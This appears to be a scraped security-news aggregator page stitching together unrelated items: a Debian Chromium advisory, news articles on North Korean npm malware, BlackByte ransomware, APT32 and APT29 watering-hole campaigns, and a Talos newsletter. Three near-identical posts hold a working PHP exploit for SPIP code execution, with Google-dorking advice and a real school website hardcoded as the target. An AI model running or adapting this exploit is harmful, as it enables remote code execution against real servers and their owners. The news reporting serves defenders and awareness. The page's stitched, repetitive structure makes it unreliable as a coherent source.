Google Chrome versions prior to 125.0.6422.112 V8 type confusion proof of concept exploit.

Google Chrome V8 Type Confusion

Debian Linux Security Advisory 5761-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5761-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonAugust 29, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-7969 CVE-2024-8193 CVE-2024-8194 CVE-2024-8198Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 128.0.6613.113-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmbRHeAACgkQZF0CR8NudjdiRA/9HmOr5Ptx9ykaQPZsUQolr3OR0gSDNgQtLYVYEWo/Zag3EDlRDDXXC5FKG+ujkWMF9w2OwZjR8j8dH0TFvz/xyI5gM7CdyDMv3FnM0afLaEASkv8EBAW5MLVdOcScfh+TRFrL7XvMW3SN4WtjSJzXiHSaYqrLBfstFy9wfjbQlnoldi6P4jJYuUiTOFb375FkmmjAs7eDF9qeuTvg2Fv2DZxdGJN52hl/saMhfTq46TEWcUTVpgxvXZMbB7T4bwn0FLCs9VGWmI27fO4F+AHT3HQgUTlubxdJvMQ/Z1aMZyQHA4xukVcRFfzHj/EzoWjGXjZe59TQx3QOADVUfVOdS4/mCG+rHhXlj3Hh3U7FrQP/SPCXZ6zcZBrNSG22EJUj3vMrlCikCZau4+0ZnlSfwAKYYenRi3qbfsv0t3Rx7XVRo2vTPVXka5T5NugdFykRdz1cTa0Y/ZllwdAh9yDQ1uFLM9k5xkGprm5yANEn//LUoM1oVviGwMF1oNHxJdupUO3diwu+Uc2GwLChjF9C0ISQYQMVx0SC3JhS41F9eKGamdzoHvJ/S4n8dDiveHlEJ8Np8Eiu3Pw+MRMNFEuBIr2Ets991gofe7WaafPu8SEV7wCbm/hUm6kl4hikcYQLO4d5v1yTOmxPBW03EpZSpBOF7DIOaj7EsWRohuUrMig==5K+x-----END PGP SIGNATURE-----

Debian Security Advisory 5761-1

SPIP version 4.2.6 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.6 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.6 Code Execution

Threat actors with ties to North Korea have been observed publishing a set of malicious packages to the npm registry, indicating "coordinated and relentless" efforts to target developers with malware and steal cryptocurrency assets.
The latest wave, which was observed between August 12 and 27, 2024, involved packages named temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and

Threat actors with ties to North Korea have been observed publishing a set of malicious packages to the npm registry, indicating "coordinated and relentless" efforts to target developers with malware and steal cryptocurrency assets.

The latest wave, which was observed between August 12 and 27, 2024, involved packages named temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console.

"Behaviors in this campaign lead us to believe that qq-console is attributable to the North Korean campaign known as 'Contagious Interview,'" software supply chain security firm Phylum said.

Contagious Interview refers to an ongoing campaign that seeks to compromise software developers with information stealing malware as part of a purported job interview process that involves tricking them into downloading bogus npm packages or fake installers for video conferencing software such as MiroTalk hosted on decoy websites.

The end goal of the attacks is to deploy a Python payload named InvisibleFerret that can exfiltrate sensitive data from cryptocurrency wallet browser extensions and set up persistence on the host using legitimate remote desktop software such as AnyDesk. CrowdStrike is tracking the activity under the moniker Famous Chollima.

The newly observed helmet-validate package adopts a new approach in that it embeds a piece of JavaScript code file called config.js that directly executes JavaScript hosted on a remote domain ("ipcheck\[.\]cloud") using the eval() function.

"Our investigation revealed that ipcheck\[.\]cloud resolves to the same IP address (167\[.\]88\[.\]36\[.\]13) that mirotalk\[.\]net resolved to when it was online," Phylum said, highlighting potential links between the two sets of attacks.

The company said it also observed another package called sass-notification that was uploaded on August 27, 2024, which shared similarities with previously uncovered npm libraries like call-blockflow. These packages have been attributed to another North Korean threat group called Moonstone Sleet.

"These attacks are characterized by using obfuscated JavaScript to write and execute batch and PowerShell scripts," it said. "The scripts download and decrypt a remote payload, execute it as a DLL, and then attempt to clean up all traces of malicious activity, leaving behind a seemingly benign package on the victim's machine."

**Famous Chollima Poses as IT Workers in U.S. Firms**

The disclosure comes as CrowdStrike linked Famous Chollima (formerly BadClone) to insider threat operations that entail infiltrating corporate environments under the pretext of legitimate employment.

"Famous Chollima carried out these operations by obtaining contract or full-time equivalent employment, using falsified or stolen identity documents to bypass background checks," the company said. "When applying for a job, these malicious insiders submitted a résumé typically listing previous employment with a prominent company as well as additional lesser-known companies and no employment gaps."

While these attacks are mainly financially motivated, a subset of the incidents are said to have involved the exfiltration of sensitive information. CrowdStrike said it has identified the threat actors applying to or actively working at more than 100 unique companies over the past year, most of which are located in the U.S., Saudi Arabia, France, the Philippines, and Ukraine, among others.

Prominently targeted sectors include technology, fintech, financial services, professional services, retail, transportation, manufacturing, insurance, pharmaceutical, social media, and media companies.

"After obtaining employee-level access to victim networks, the insiders performed minimal tasks related to their job role," the company further said. In some cases, the insiders also attempted to exfiltrate data using Git, SharePoint, and OneDrive."

"Additionally, the insiders installed the following RMM tools: RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. The insiders then leveraged these RMM tools in tandem with company network credentials, which allowed numerous IP addresses to connect to the victim's system."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Target Developers with Malicious npm Packages

As we head into the final third of 2024, we caught up with Talos' Nick Biasini to ask him about the biggest shifts and trends in the threat landscape so far. Turns out, he has two major areas of concern.

Thursday, August 29, 2024 14:00

Hello Talos followers. I’m back for my annual takeover of the Threat Source newsletter. First, an update on that killer sloth movie I was so excited about in August 2023. “Slotherhouse” debuted with an impressive $137,133 at the box office, with critics hailing its various set pieces such as “death by sleeping bag balcony trap” (read that again) and “a particularly gruesome use of hair straighteners.” 

Onto less grisly fare. In the times when I used to frequent the site formerly known as Twitter, my favorite account to follow was “Sorkinese” – a daily elocution safari with the wit and wisdom of Aaron Sorkin characters (mainly from The West Wing). Before Sorkinese’s well timed final tweet in July last year (“The internet people have gone crazy!”) one piece of Sorkin dialogue that I always enjoyed seeing on the feed was “What kind of day has it been?.” The Wingnuts amongst you will know that Sorkin used this as the title of key episodes in several of his shows. It’s meant to signal the end of something, and a reflection of what’s important.  

As summer is drawing to a close and “sweater weather” begins again in earnest, I wanted to use this opportunity to reflect a little…what kind of summer has it been? 

I live in the UK, so “wet” is the first word that comes to mind. But since I allegedly work in the security industry, and this is allegedly a security newsletter, I’ll steer things in that direction. In a "here's what I made earlier" moment (hello to the small percentage of Brits who will get that reference), this is a video which features Talos’ Head of Outreach Nick Biasini. We asked him to reflect on his two biggest areas of concern/importance in the threat landscape right now: 

One more quick thing – it’s now a week until we launch our new documentary, “The Light We Keep: A Project PowerUp Story.” This video will explore first-hand accounts of the chaos and consequences of electronic warfare, and how we developed a solution to maintain reliable power in the event of GPS jamming on Ukraine's electrical grid.

Keep an eye on our social channels for its release and be sure to join us for the live online launch event which will include a Q & A with myself, Joe Marshall, Matt Watchinski, and Matt Olney. 

Register for the livestream on September 5th 

Watch The Light We Keep trailer 

**The one big thing **

 BlackByte is a ransomware-as-a-service (RaaS) group believed to be an offshoot of the infamous Conti ransomware group. They have continued to leverage tactics, techniques and procedures (TTPs) that have formed the foundation of its tradecraft since its inception, continuously iterating its use of vulnerable drivers to bypass security protections and deploying a self-propagating, wormable ransomware encryptor. In recent investigations, Cisco Talos Incident Response (Talos IR) has also observed BlackByte using techniques that depart from their established tradecraft. Members of the team, in collaboration with Talos Intelligence and Interdiction, wrote a blog detailing their findings. 

** Why do I care? **

 During an investigation of a recent BlackByte attack, Talos IR and Talos threat intelligence personnel noted close similarities between indicators of compromise (IOCs) discovered during the investigation and other events flagged in Talos’ global telemetry. Further investigation of these similarities provided additional insights into BlackByte’s current tradecraft and revealed that the group has been significantly more active than would appear from the number of victims published on its data leak site. 

**So now what? **

 Talos IR has provided a full set of recommendations to help defenders protect against RAAS groups such as BlackByte. Including how to detect lateral movement. You’ll find these recommendations in the blog, alongside the MITRE ATT&CK mapping of new TTPs, and Indicators of Compromise. 

**Top security headlines of the week **

*   Hundreds of open-source large language model (LLM) builder servers and dozens of vector databases are leaking highly sensitive information to the open Web. Dark Reading 
*   A recent Qilin ransomware attack targeted credentials that were stored in Google Chrome browsers on a portion of the impacted network’s endpoints. Researchers said the move is an “unusual tactic, and one that could be a bonus multiplier for the chaos already inherent in ransomware situations.” Decipher 
*   Labor Day warning: Protect your date with these high-tech travel tips. Talos’ Nick Biasini recently gave advice on how to spot travel related phishing emails, and how to be aware of vulnerable Bluetooth connections and WIFI spots. Share with your friends and family! ABC News 

**Can’t get enough Talos? **

Talos’ Kelly Patterson just released a 3-part blog series of her research into the intricacies of fuzzing µC/OS protocol stacks. Kelly hopes her research will encourage more widespread use of fuzzing of RTOS software components.  

Check out the series below: 

*   Part 1: HTTP server fuzzing 
*   Part 2: Handling multiple requests per test case  
*   Part 3: TCP/IP server fuzzing, implementing a TAP driver  

**Upcoming events where you can find Talos **

Live launch of The Light We Keep documentary, followed by Q & A (Sept. 5th) 

Online 

BSides Krakow (Sept. 14)   

Krakow, Poland  

LABScon (Sept. 18 - 21)  

Scottsdale, Arizona 

VB2024 (Oct. 2 - 4) 

Dublin, Ireland 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  

MD5: 7bdbd180c081fa63ca94f9c22c457376 

Typical Filename: c0dwjdi6a.dll 

Claimed Product: N/A  

Detection Name: Trojan.GenericKD.33515991 

**SHA 256**:9ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc 

**MD5:** 4813fa6d610e180b097eae0ce636d2aa 

**Typical Filename:** xmrig.exe 

**Claimed Product:** XMRig 

**Detection Name:** Trojan.GenericKD.70491190 

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe

**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a

**Typical Filename:** nYzVlQyRnQmDcXk

**Claimed Product:** N/A

**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0

**MD5:** 8c69830a50fb85d8a794fa46643493b2

**Typical Filename:** AAct.exe

**Claimed Product:** N/A

**Detection Name:** PUA.Win.Dropper.Generic::1201

What kind of summer has it been?

A non-profit supporting Vietnamese human rights has been the target of a multi-year campaign designed to deliver a variety of malware on compromised hosts.
Cybersecurity company Huntress attributed the activity to a threat cluster known as APT32, a Vietnamese-aligned hacking crew that's also known as APT-C-00, Canvas Cyclone (formerly Bismuth), Cobalt Kitty, and OceanLotus. The intrusion is

Cyber Espionage / Malware

A non-profit supporting Vietnamese human rights has been the target of a multi-year campaign designed to deliver a variety of malware on compromised hosts.

Cybersecurity company Huntress attributed the activity to a threat cluster known as APT32, a Vietnamese-aligned hacking crew that's also known as APT-C-00, Canvas Cyclone (formerly Bismuth), Cobalt Kitty, and OceanLotus. The intrusion is believed to have been ongoing for at least four years.

"This intrusion has a number of overlaps with known techniques used by the threat actor APT32/OceanLotus, and a known target demographic which aligns with APT32/OceanLotus targets," security researchers Jai Minton and Craig Sweeney said.

OceanLotus, active since at least 2012, has a history of targeting company and government networks in East-Asian countries, particularly Vietnam, the Philippines, Laos, and Cambodia with the end goal of cyber espionage and intellectual property theft.

Attack chains typically make use of spear-phishing lures as the initial penetration vector to deliver backdoors capable of running arbitrary shellcode and collecting sensitive information. That said, the group has also been observed orchestrating watering hole campaigns as early as 2018 to infect site visitors with a reconnaissance payload or harvest their credentials.

The latest set of attacks pieced together by Huntress spanned four hosts, each of which was compromised to add various scheduled tasks and Windows Registry keys that are responsible for launching Cobalt Strike Beacons, a backdoor that enables the theft of Google Chrome cookies for all user profiles on the system, and loaders responsible for launching embedded DLL payloads.

The development comes as South Korean users are the target of an ongoing campaign that likely leverages spear-phishing and vulnerable Microsoft Exchange servers to deliver reverse shells, backdoors, and VNC malware to gain control of infected machines and steal credentials stored in web browsers.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Vietnamese Human Rights Group Targeted in Multi-Year Cyberattack by APT32

Cybersecurity researchers have flagged multiple in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to infect mobile users with information-stealing malware.
"These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices," Google Threat Analysis Group (TAG) researcher Clement

Browser Security / Vulnerability

Cybersecurity researchers have flagged multiple in-the-wild exploit campaigns that leveraged now-patched flaws in Apple Safari and Google Chrome browsers to infect mobile users with information-stealing malware.

"These campaigns delivered n-day exploits for which patches were available, but would still be effective against unpatched devices," Google Threat Analysis Group (TAG) researcher Clement Lecigne said in a report shared with The Hacker News.

The activity, observed between November 2023 and July 2024, is notable for delivering the exploits by means of a watering hole attack on Mongolian government websites, cabinet.gov\[.\]mn and mfa.gov\[.\]mn.

The intrusion set has been attributed with moderate confidence to a Russian state-backed threat actor codenamed APT29 (aka Midnight Blizzard), with parallels observed between the exploits used in the campaigns and those previously linked to commercial surveillance vendors (CSVs) Intellexa and NSO Group, indicating exploit reuse.

The vulnerabilities at the center of the campaigns are listed below -

*   **CVE-2023-41993** - A WebKit flaw that could result in arbitrary code execution when processing specially crafted web content (Fixed by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)

*   **CVE-2024-4671** - A use-after-free flaw in Chrome's Visuals component that could result in arbitrary code execution (Fixed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024)

*   **CVE-2024-5274** - A type confusion flaw in the V8 JavaScript and WebAssembly engine that could result in arbitrary code execution (Fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024)

The November 2023 and February 2024 campaigns are said to have involved the compromises of the two Mongolian government websites – both in the first and only mfa.gov\[.\]mn in the latter – to deliver an exploit for CVE-2023-41993 by means of a malicious iframe component pointing to an actor-controlled domain.

"When visited with an iPhone or iPad device, the watering hole sites used an iframe to serve a reconnaissance payload, which performed validation checks before ultimately downloading and deploying another payload with the WebKit exploit to exfiltrate browser cookies from the device," Google said.

The payload is a cookie stealer framework that Google TAG previously detailed in connection with the 2021 exploitation of an iOS zero-day (CVE-2021-1879) to harvest authentication cookies from several popular websites, including Google, Microsoft, LinkedIn, Facebook, Yahoo, GitHub, and Apple iCloud, and send them via WebSocket to an attacker-controlled IP address.

"The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated," Google noted at the time, adding "attackers used LinkedIn messaging to target government officials from western European countries by sending them malicious links."

The fact that the cookie stealer module also singles out the website "webmail.mfa.gov\[.\]mn" suggests that Mongolian government employees were a likely target of the iOS campaign.

The mfa.gov\[.\]mn website was infected a third time in July 2024 to inject JavScript code that redirected Android users using Chrome to a malicious link that served an exploit chain combining the flaws CVE-2024-5274 and CVE-2024-4671 to deploy a browser information stealing payload.

In particular, the attack sequence uses CVE-2024-5274 to compromise the renderer and CVE-2024-4671 to achieve a sandbox escape vulnerability, ultimately making it possible to break out of Chrome site isolation protections and deliver a stealer malware.

"This campaign delivers a simple binary deleting all Chrome Crash reports and exfiltrating the following Chrome databases back to the track-adv\[.\]com server – similar to the basic final payload seen in the earlier iOS campaigns," Google TAG noted.

The tech giant further said the exploits used in the November 2023 watering hole attack and by Intellexa in September 2023 share the same trigger code, a pattern also observed in the triggers for CVE-2024-5274 used in the July 2024 watering hole attack and by NSO Group in May 2024.

What's more, the exploit for CVE-2024-4671 is said to share similarities with a previous Chrome sandbox escape that Intellexa was discovered as using in the wild in connection with another Chrome flaw CVE-2021-37973, which was addressed by Google in September 2021.

While it's currently not clear how the attackers managed to acquire the exploits for the three flaws, the findings make it amply clear that nation-state actors are using n-day exploits that were originally used as zero-days by CSVs.

It, however, raises the possibility that the exploits may have been procured from a vulnerability broker who previously sold them to the spyware vendors as zero-days, a steady supply of which keeps the ball rolling as Apple and Google shore up defenses.

"Moreover, watering hole attacks remain a threat where sophisticated exploits can be utilized to target those that visit sites regularly, including on mobile devices," the researchers said. "Watering holes can still be an effective avenue for n-day exploits by mass targeting a population that might still run unpatched browsers."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Hackers Exploit Safari and Chrome Flaws in High-Profile Cyberattack

Suspected Russian hackers have compromised a series of websites to utilize sophisticated spyware exploits that are eerily similar to those created by NSO Group and Intellexa.

In recent years, elite commercial spyware vendors like Intellexa and NSO Group have developed an array of powerful hacking tools that exploit rare and unpatched “zero-day” software vulnerabilities to compromise victim devices. And increasingly, governments around the world have emerged as the prime customers for these tools, compromising the smartphones of opposition leaders, journalists, activists, lawyers, and others. On Thursday, though, Google's Threat Analysis Group is publishing findings about a series of recent hacking campaigns—seemingly carried out by Russia's notorious APT29 Cozy Bear gang—that incorporate exploits very similar to ones developed by Intellexa and NSO Group into ongoing espionage activity.

Between November 2023 and July 2024, the attackers compromised Mongolian government websites and used the access to conduct “watering hole” attacks, in which anyone with a vulnerable device who loads a compromised website gets hacked. The attackers set up the malicious infrastructure to use exploits that “were identical or strikingly similar to exploits previously used by commercial surveillance vendors Intellexa and NSO Group,” Google’s TAG wrote on Thursday. The researchers say they “assess with moderate confidence” that the campaigns were carried out by APT29.

These spyware-esque hacking tools exploited vulnerabilities in Apple's iOS and Google's Android that had largely already been patched. Originally, they were deployed by the spyware vendors as unpatched, zero-day exploits, but in this iteration, the suspected Russian hackers were using them to target devices that hadn't been updated with these fixes.

“While we are uncertain how suspected APT29 actors acquired these exploits, our research underscores the extent to which exploits first developed by the commercial surveillance industry are proliferated to dangerous threat actors,” the TAG researchers wrote. “Moreover, watering hole attacks remain a threat where sophisticated exploits can be utilized to target those that visit sites regularly, including on mobile devices. Watering holes can still be an effective avenue for … mass targeting a population that might still run unpatched browsers.”

It is possible that the hackers purchased and adapted the spyware exploits or that they stole them or acquired them through a leak. It is also possible that the hackers were inspired by commercial exploits and reverse engineered them by examining infected victim devices.

“NSO does not sell its products to Russia," Gil Lainer, NSO Groups vice president for global communications, told WIRED in a statement. “Our technologies are sold exclusively to vetted US & Israel-allied intelligence and law enforcement agencies. Our systems and technologies are highly secure and are continuously monitored to detect and neutralize external threats.”

Between November 2023 and February 2024, the hackers used an iOS and Safari exploit that was technically identical to an offering that Intellexa had first debuted a couple of months earlier as an unpatched zero-day in September 2023. In July 2024, the hackers also used a Chrome exploit adapted from an NSO Group tool that first appeared in May 2024. This latter hacking tool was used in combination with an exploit that had strong similarities to one Intellexa debuted back in September 2021.

When attackers exploit vulnerabilities that have already been patched, the activity is known as “n-day exploitation,” because the vulnerability still exists and can be abused in unpatched devices as time passes. The suspected Russian hackers incorporated the commercial spyware adjacent tools, but constructed their overall campaigns—including malware delivery and activity on compromised devices—differently than the typical commercial spyware customer would. This indicates a level of fluency and technical proficiency characteristic of an established and well-resourced state-backed hacking group.

“In each iteration of the watering hole campaigns, the attackers used exploits that were identical or strikingly similar to exploits from \[commercial surveillance vendors\], Intellexa and NSO Group,” TAG wrote. “We do not know how the attackers acquired these exploits. What is clear is that APT actors are using n-day exploits that were originally used as 0-days by CSVs.”

_Updated at 2pm ET, August 29, 2024: Added comment from NSO Group._

Powerful Spyware Exploits Enable a New String of ‘Watering Hole’ Attacks

SPIP version 4.2.5 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.5 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.5 Code Execution

SPIP version 4.2.2 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.2 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#chrome